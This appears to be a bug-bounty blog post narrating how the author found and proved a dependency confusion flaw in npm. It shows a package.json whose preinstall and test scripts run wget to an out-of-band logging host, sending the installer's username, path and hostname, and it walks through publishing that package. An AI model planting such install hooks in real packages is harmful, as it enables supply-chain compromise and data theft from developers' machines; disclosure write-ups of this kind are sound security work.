.png)
3 weeks ago
28 BOOK THIS SPACE FOR AD
ARTICLE AD
السلام عليكم ورحمة الله وبركاتة
Hello Hackers 😀
Today Inshallah I am gonna show you How I found My First Dependency Confusion Vulnerability
Dependency Confusion is a type of vulnerability where a Hacker tricks package managers into installing a compromised package instead of the intended internal one. This can occur when a package manager, like NPM or PyPI, mistakenly pulls a package from a public repository rather than a private one, potentially leading to serious security issues, such as unauthorized code execution.
I was browsing the target website with Burp Suite actively monitoring traffic. Suddenly, a high-severity alert appeared in Burp’s Issues tab, flagging a potential Dependency Confusion vulnerability.
Intrigued, I decided to investigate further. Burp’s notification suggested that the system might be vulnerable to Dependency Confusion attacks, where the Dependency was not found on the https://www.npmjs.com/ Site So I went to Check myself if the dependency wasn’t registered on the site.
And indeed 0 packages found.
First create the package using the
npm initwith a higher version than the one used so that when installing or updating the dependency, the package manager will look for the higher version in case of bad configuration.
In the case of the NPM package, there is a property called scripts in the generated package.json file. In this case, we will use the preinstall option passing a command to verify the possibility of remote code execution.
For this check, I used http://requestrepo.com/ , which is a Website used for out-of-band data extraction. Then, it is possible to enter a command to verify the code execution, extracting, in this case, I used
"scripts": {"test": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
"preinstall": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "
},
bringing the user, path and host-name. the modified version looks like
It is necessary to create an account at https://www.npmjs.com/, and only after verifying the account by email it is possible to publish the package, as seen in the steps below:
after creating the account login usingnpm loginwill redirect you to NPM site to login
2. then publish the package using
npm publishShould look like something like this
when someone install or trying to update the package the NPM will try to get the higher version which is our version the command will execute something like this.
Bengali (Bangladesh) · 
English (United States) ·